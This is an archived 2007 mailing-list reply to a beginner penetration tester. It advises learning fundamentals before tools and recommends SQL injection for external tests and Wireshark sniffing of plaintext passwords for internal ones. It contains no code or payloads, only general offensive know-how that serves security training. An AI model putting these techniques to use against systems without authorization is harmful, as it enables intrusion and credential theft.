Re: Most Successful Exploits/Tools to use against windows & Linux?

From: Derek Fountain (derekfountain@yahoo.co.uk)
Date: Sat May 26 2007 - 06:40:27 EDT


Pen Testee wrote:
> I am just getting started with Pen Testing and there is soooo much information available.
> I am trying to get the most bang for my time spent in getting up to speed.
> What are the best exploits to start with so that I am likely to have the most success.
> I am looking for suggestions from both within a network and from an external test...please label internal or external when providing your response.
>
> What are the best links that list tools to use against exploits or exploits to try and tool to use.

When you're starting out, you don't need tools. That's the way to
becoming a script kiddie. What you need is understanding. You need to
learn how systems work, what mistakes their administrators/programmers
make that make them vulnerable, and how those mistakes are exploited in
order to crack the box. Once you understand what you're doing, you'll be
able to choose the right tool for the right circumstances. Once you've
chosen the tool, it'll just make your process more efficient.

OK, lecture over, here's my answer. :o) Note it's /my/ answer - it's
rather subjective.

For external servers, start with SQL injection. It's easy to do and easy
to understand. It's also remarkable how many programmers make the
mistake of putting user input directly into their database queries. This
makes it an attack vector with a high chance of success.

For internal attacks you should be looking at network sniffing. Despite
the increased use of SSL based protocols, there are still loads of
legacy applications in use that send passwords in plain text over
internal networks. You only need to spot one password and chances are
it'll let you into all sorts of accounts. So you'll want to get a book
on TCP/IP and learn to use something like Wireshark to pull passwords
off the wires.

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!

http://www.cenzic.com/c/2020
------------------------------------------------------------------------



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:50 EDT